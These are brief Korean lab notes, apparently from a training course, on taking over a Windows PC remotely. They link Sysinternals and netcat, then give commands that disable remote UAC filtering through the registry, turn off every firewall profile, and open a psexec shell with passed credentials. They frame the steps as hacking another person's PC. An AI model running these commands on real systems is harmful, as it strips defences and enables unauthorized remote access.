오프라인 8일차 (원격 조종_pc 점령하기)
https://docs.microsoft.com/en-us/sysinternals/downloads/
Sysinternals Utilities - Windows Sysinternals
Evaluate and find out how to install, deploy, and maintain Windows with Sysinternals utilities.
docs.microsoft.com
> SysinternalsSuite 다운
Sysinternals Utilities - Windows Sysinternals
Evaluate and find out how to install, deploy, and maintain Windows with Sysinternals utilities.
docs.microsoft.com
https://packetstormsecurity.com/files/download/12621/nc11nt.zip
Download: nc11nt.zip ≈ Packet Storm
© 2022 Packet Storm. All rights reserved.
packetstormsecurity.com
netcat 다운
SysinternalsSuite 받은 위치 관리자 권한으로 cmd 실행후 이동
https://stackoverflow.com/questions/828432/psexec-access-denied-errors
PSEXEC, access denied errors
While I'm using PSEXEC.exe getting 'Access denied' error for remote systems. Any idea about how to solve this?
stackoverflow.com
다음과 같이 진행
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
netsh advfirewall set allprofiles state off
id와 pw 전달
공격자가
psexec -i \\ip -u id -p pass cmd

>>

상대방 pc 해킹하는 방법!!!
원격으로